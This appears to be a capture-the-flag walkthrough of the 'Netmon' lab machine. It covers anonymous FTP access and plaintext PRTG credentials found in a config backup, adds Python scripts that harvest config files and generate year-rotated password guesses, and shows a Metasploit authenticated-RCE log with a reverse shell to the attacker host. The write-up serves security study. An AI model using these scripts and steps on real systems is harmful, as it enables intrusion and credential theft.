Netmon

From RCATs
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-16 18:29 MST
Nmap scan report for 10.129.96.142
Host is up (0.093s latency).
Not shown: 995 closed tcp ports (conn-refused)
PORT    STATE SERVICE      VERSION
21/tcp  open  ftp          Microsoft ftpd
| ftp-syst:
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-02-19  11:18PM                 1024 .rnd
| 02-25-19  09:15PM       <DIR>          inetpub
| 07-16-16  08:18AM       <DIR>          PerfLogs
| 02-25-19  09:56PM       <DIR>          Program Files
| 02-02-19  11:28PM       <DIR>          Program Files (x86)
| 02-03-19  07:08AM       <DIR>          Users
|_02-25-19  10:49PM       <DIR>          Windows
80/tcp  open  http         Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-server-header: PRTG/18.1.37.13946
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2022-12-17T01:29:58
|_  start_date: 2022-12-17T01:28:50
| smb2-security-mode:
|   311:
|_    Message signing enabled but not required
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.05 seconds

Anonymous FTP login is allowed, and the listing nmap pulled back (inetpub, PerfLogs, Program Files, Users, Windows) is the root of C:\. Log in and look around:

❯ ftp anonymous@10.129.96.142
Connected to 10.129.96.142.
220 Microsoft FTP Service
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
# cd to Users\Public
ftp> cd Public
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-03-19  07:05AM       <DIR>          Documents
07-16-16  08:18AM       <DIR>          Downloads
07-16-16  08:18AM       <DIR>          Music
07-16-16  08:18AM       <DIR>          Pictures
12-16-22  08:29PM                   34 user.txt
07-16-16  08:18AM       <DIR>          Videos
# Grab User Flag
# look around other directories
ftp> pwd
257 "/Users/All Users/Paessler/PRTG Network Monitor" is current directory.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
12-16-22  09:11PM       <DIR>          Configuration Auto-Backups
12-16-22  08:39PM       <DIR>          Log Database
02-02-19  11:18PM       <DIR>          Logs (Debug)
02-02-19  11:18PM       <DIR>          Logs (Sensors)
02-02-19  11:18PM       <DIR>          Logs (System)
12-16-22  08:39PM       <DIR>          Logs (Web Server)
12-16-22  08:39PM       <DIR>          Monitoring Database
12-16-22  11:35PM              1186545 PRTG Configuration.dat
02-25-19  09:54PM              1189697 PRTG Configuration.old
07-14-18  02:13AM              1153755 PRTG Configuration.old.bak
12-16-22  11:16PM              1722088 PRTG Graph Data Cache.dat
02-25-19  10:00PM       <DIR>          Report PDFs
02-02-19  11:18PM       <DIR>          System Information Database
02-02-19  11:40PM       <DIR>          Ticket Database
02-02-19  11:18PM       <DIR>          ToD
# grab PRTG config files
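To automate what the ftp session above does by hand, here is an added example (mine, not part of the original write-up): it parses the MS-DOS style listing lines the Microsoft FTP service prints, recursively walks an anonymous share, and picks out PRTG configuration backups and flag files to download. The embedded listing is constructed in the format shown above; the host argument, the anonymous login and passive-mode transfers are assumptions, and the network part only runs when a host is given on the command line.

```python
"""Walk an anonymous Microsoft FTP share and flag PRTG configuration backups.

Added example; not part of the original write-up. parse_listing() handles
the MS-DOS style lines the IIS FTP service prints, walk() recurses through
the share, and interesting_files() picks out what to download.
SAMPLE_LISTING is constructed in that format; the host argument, anonymous
login and passive mode are assumptions.
"""
import re
import sys
from ftplib import FTP, error_perm

# IIS "dir"/LIST line:  MM-DD-YY  HH:MMAM|PM  <DIR> or byte size  name
IIS_LINE = re.compile(
    r"^(\d{2}-\d{2}-\d{2})\s+(\d{2}:\d{2}[AP]M)\s+(<DIR>|\d+)\s+(.+?)\s*$"
)

# Constructed sample, same shape as the PRTG Network Monitor listing above.
SAMPLE_LISTING = """\
12-16-22  09:11PM       <DIR>          Configuration Auto-Backups
12-16-22  11:35PM              1186545 PRTG Configuration.dat
02-25-19  09:54PM              1189697 PRTG Configuration.old
07-14-18  02:13AM              1153755 PRTG Configuration.old.bak
12-16-22  11:16PM              1722088 PRTG Graph Data Cache.dat
02-25-19  10:00PM       <DIR>          Report PDFs
"""

# File names worth pulling: PRTG config files, stale copies, the user flag.
INTERESTING = re.compile(r"configuration|\.bak$|\.old$|user\.txt$", re.I)


def parse_listing(lines):
    """Turn IIS LIST output into dicts; lines in another format are skipped."""
    entries = []
    for line in lines:
        m = IIS_LINE.match(line)
        if not m:
            continue
        date, time, kind, name = m.groups()
        entries.append({
            "name": name,
            "is_dir": kind == "<DIR>",
            "size": None if kind == "<DIR>" else int(kind),
            "modified": f"{date} {time}",
        })
    return entries


def interesting_files(entries):
    """Names of plain files matching INTERESTING, largest first."""
    hits = [e for e in entries if not e["is_dir"] and INTERESTING.search(e["name"])]
    return [e["name"] for e in sorted(hits, key=lambda e: e["size"], reverse=True)]


def walk(ftp, path="/", depth=0, max_depth=6):
    """Yield (full_path, entry) for everything under `path`, recursing into dirs."""
    lines = []
    try:
        ftp.cwd(path)
        ftp.retrlines("LIST", lines.append)
    except error_perm:
        return  # directory not readable anonymously; skip it
    for entry in parse_listing(lines):
        full = path.rstrip("/") + "/" + entry["name"]
        yield full, entry
        if entry["is_dir"] and depth < max_depth:
            yield from walk(ftp, full, depth + 1, max_depth)


if __name__ == "__main__":
    if len(sys.argv) > 1:
        # Live run against the host given on the command line (assumed reachable).
        ftp = FTP(sys.argv[1], timeout=10)
        ftp.login("anonymous", "anonymous@example.com")
        for full, entry in walk(ftp):
            if not entry["is_dir"] and INTERESTING.search(entry["name"]):
                print(f"{entry['size']:>10}  {entry['modified']}  {full}")
        ftp.quit()
    else:
        # Offline demo on the constructed sample.
        for name in interesting_files(parse_listing(SAMPLE_LISTING.splitlines())):
            print(name)
```

Run with no arguments to see the parser at work on the sample; run with the target IP to walk the share and print every candidate file with its size and path.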

❯ grep -C2 pass PRTG\ Configuration.old.bak

Winner! The oldest backup (PRTG Configuration.old.bak, dated 07-14-18) has the prtgadmin password in plaintext:

            </dbcredentials>
            <dbpassword>
              <!-- User: prtgadmin -->
              PrTg@dmin2018
            </dbpassword>

Possible PRTG version? The page source agrees with the 18.1.37.13946 in the server header:

 <link rel="stylesheet" type="text/css" href="/css/prtgmini.css?prtgversion=18.1.37.13946__" media="print,screen,projection" />

Tried to log into the PRTG admin page as prtgadmin with PrTg@dmin2018. Failed. The backup is from 2018 and the password ends in a year, so tried changing the year to 2022.... didn't work (old box). Tried 2021, 2020, nothing. 2019 works: prtgadmin / PrTg@dmin2019!
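As an added example (not from the original write-up), the following script generalises the grep above: it parses a PRTG configuration backup as XML, reports every element whose name contains "password" together with the user named in an adjacent `<!-- User: ... -->` comment, and derives the year-rotated guesses that led to the working password. The embedded XML is constructed to mirror the `<dbpassword>` fragment shown above; the enclosing element names (`prtg`, `data`, `smtppassword`) are assumptions, and it needs Python 3.8+ for `TreeBuilder(insert_comments=True)`.

```python
"""Extract credential candidates from a PRTG configuration backup.

Added example; not part of the original write-up. It generalises the
`grep -C2 pass` step: every element whose name contains "password" is
reported with the user named in an adjacent <!-- User: ... --> comment,
and year_variants() produces the rotated guesses tried above.
SAMPLE_CONFIG is constructed to mirror the <dbpassword> fragment found in
PRTG Configuration.old.bak; the enclosing element names (prtg, data,
smtppassword) are assumptions. Needs Python 3.8+ (insert_comments).
"""
import datetime
import re
import sys
import xml.etree.ElementTree as ET

SAMPLE_CONFIG = """<?xml version="1.0" encoding="UTF-8"?>
<prtg>
  <data>
    <dbcredentials>
    </dbcredentials>
    <dbpassword>
      <!-- User: prtgadmin -->
      PrTg@dmin2018
    </dbpassword>
    <smtppassword>
    </smtppassword>
  </data>
</prtg>
"""

USER_COMMENT = re.compile(r"User:\s*(\S+)")
TRAILING_YEAR = re.compile(r"^(.*?)((?:19|20)\d{2})$")


def extract_credentials(xml_text):
    """One record per *password* element: element name, plaintext value, user hint.

    value is None when the element carries no text (e.g. a blanked secret).
    Comments are kept in the tree so the text after them is not lost and
    the "User:" hint can be read.
    """
    parser = ET.XMLParser(target=ET.TreeBuilder(insert_comments=True))
    root = ET.fromstring(xml_text, parser=parser)
    records = []
    for elem in root.iter():
        if not isinstance(elem.tag, str) or "password" not in elem.tag.lower():
            continue
        # Text may sit before and/or after an embedded comment: collect both.
        pieces = [elem.text or ""] + [child.tail or "" for child in elem]
        value = "".join(pieces).strip() or None
        user_hint = None
        for child in elem:
            if child.tag is ET.Comment:
                m = USER_COMMENT.search(child.text or "")
                if m:
                    user_hint = m.group(1)
        records.append({"element": elem.tag, "user_hint": user_hint, "value": value})
    return records


def year_variants(password, newest_year):
    """Bump a trailing four-digit year, newest first, down to (excluding) the original.

    year_variants("PrTg@dmin2018", 2022) gives the 2022, 2021, 2020, 2019
    order tried above; [] when the password does not end in a year.
    """
    m = TRAILING_YEAR.match(password)
    if not m:
        return []
    stem, year = m.group(1), int(m.group(2))
    return [f"{stem}{y}" for y in range(newest_year, year, -1)]


if __name__ == "__main__":
    if len(sys.argv) > 1:
        # utf-8-sig strips a BOM if the backup has one (assumption about the file).
        with open(sys.argv[1], encoding="utf-8-sig", errors="replace") as fh:
            text = fh.read()
    else:
        text = SAMPLE_CONFIG
    this_year = datetime.date.today().year
    for rec in extract_credentials(text):
        shown = rec["value"] if rec["value"] is not None else "<no plaintext>"
        print(f"{rec['element']:<16} user={rec['user_hint'] or '?':<12} value={shown}")
        if rec["value"]:
            for guess in year_variants(rec["value"], this_year):
                print(f"{'':<16} try: {guess}")
```

Point it at each of the three downloaded PRTG Configuration.* files in turn; an element that comes back as `<no plaintext>` is one where the secret has been blanked or stored in some other form, and the year-rotated list is what to feed the login page.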

Ran searchsploit to see if there are any goodies:

❯ searchsploit PRTG
-------------------------------------------------------------------------- ---------------------------
 Exploit Title                                                            |  Path
-------------------------------------------------------------------------- ---------------------------
PRTG Network Monitor 18.2.38 - (Authenticated) Remote Code Execution      | windows/webapps/46527.sh
PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS                     | windows/webapps/49156.txt
PRTG Network Monitor < 18.1.39.1648 - Stack Overflow (Denial of Service)  | windows_x86/dos/44500.py
PRTG Traffic Grapher 6.2.1 - 'url' Cross-Site Scripting                   | java/webapps/34108.txt
-------------------------------------------------------------------------- ---------------------------
Shellcodes: No Results

Booted up MSF to give it a shot; it has a module for the authenticated RCE, exploit/windows/http/prtg_authenticated_rce. With the prtgadmin / PrTg@dmin2019 credentials it works, straight to SYSTEM:

msf6 exploit(windows/http/prtg_authenticated_rce) > run
[*] Started reverse TCP handler on 10.10.16.18:4444
[+] Successfully logged in with provided credentials
[+] Created malicious notification (objid=2018)
[+] Triggered malicious notification
[+] Deleted malicious notification
[*] Waiting for payload execution.. (30 sec. max)
[*] Sending stage (175686 bytes) to 10.129.96.142
[*] Meterpreter session 1 opened (10.10.16.18:4444 -> 10.129.96.142:51587) at 2022-12-16 21:30:51 -0700
meterpreter > shell
Process 2488 created.
Channel 1 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system